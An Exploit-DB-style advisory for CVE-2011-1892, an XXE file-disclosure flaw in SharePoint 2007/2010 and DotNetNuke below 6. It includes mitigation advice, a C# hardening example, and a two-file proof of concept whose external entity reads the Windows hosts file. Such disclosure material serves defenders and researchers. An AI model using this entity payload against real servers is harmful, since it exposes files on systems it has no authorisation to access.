Vendor: SharePoint Server
By: Nicolas Gregoire
CVSS: 5.5 (MEDIUM)
File Disclosure
CWE: 611
Product Name: SharePoint Server
Affected Version From: SharePoint 2007
Affected Version To: SharePoint 2010, DotNetNuke < 6
Patch Exists: NO
Related CVE: CVE-2011-1892
CPE: a:microsoft:sharepoint_server:2007
Platforms Tested: Windows
2011

File disclosure via XEE in SharePoint and DotNetNuke

This exploit allows an attacker to disclose files on SharePoint 2007/2010 and DotNetNuke versions lower than 6. By exploiting an XML External Entity (XEE) vulnerability, the attacker can read arbitrary files on the system. The proof of concept (POC) files xee.xml and xee.xsl are provided.

Mitigation:

To mitigate this vulnerability, it is recommended to apply the latest patches provided by the vendors. Additionally, input validation should be implemented to prevent malicious XML parsing.
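
An added example, not code from the original advisory or from Microsoft or DotNetNuke: one way to apply the "prevent malicious XML parsing" advice in .NET code that handles untrusted XML is to reject any DOCTYPE and remove the resolver. The class and method names and the placeholder entity path are assumptions made for illustration.

```csharp
using System;
using System.IO;
using System.Xml;

static class XeeHardeningDemo
{
    // Constructed sample: same shape as the xee.xml proof of concept, but the
    // entity points at a placeholder path rather than a real file.
    const string Untrusted =
        "<!DOCTYPE doc [<!ENTITY boom SYSTEM \"file:///placeholder/not-a-real-file\">]>" +
        "<doc>&boom;</doc>";

    // Hardened settings: any DOCTYPE is a fatal error, and no resolver exists
    // to fetch external resources.
    static XmlReaderSettings HardenedSettings()
    {
        return new XmlReaderSettings
        {
            DtdProcessing = DtdProcessing.Prohibit, // .NET 4.0+; on 2.0/3.5 set ProhibitDtd = true
            XmlResolver = null
        };
    }

    // Returns true if the document parses under the hardened settings.
    static bool TryParse(string xml, out string reason)
    {
        reason = null;
        try
        {
            using (var reader = XmlReader.Create(new StringReader(xml), HardenedSettings()))
            {
                var doc = new XmlDocument { XmlResolver = null };
                doc.Load(reader);
            }
            return true;
        }
        catch (XmlException e)
        {
            reason = e.Message; // log this; do not echo parser errors to the client
            return false;
        }
    }

    static void Main()
    {
        string reason;
        Console.WriteLine("benign:  " + TryParse("<doc>hello</doc>", out reason));
        Console.WriteLine("doctype: " + TryParse(Untrusted, out reason) + " / " + reason);
    }
}
```

With these settings the benign document loads and the DOCTYPE-bearing one is rejected with an XmlException before any entity is resolved.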

Exploit-DB raw data:

Exploit Title: File disclosure via XEE in SharePoint and DotNetNuke
Date: September 15, 2011
Author: Nicolas Gregoire
Version: SharePoint 2007 / 2010, DotNetNuke < 6
CVE : CVE-2011-1892

poc filename: xee.xml

<!DOCTYPE doc [
<!ENTITY boom SYSTEM "c:\\windows\\system32\\drivers\\etc\\hosts">
]>
<doc>&boom;</doc>

poc filename: xee.xsl

<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
        <xsl:template match="/">
                <xsl:apply-templates/>
                <xsl:value-of select="doc"/>
        </xsl:template>
</xsl:stylesheet>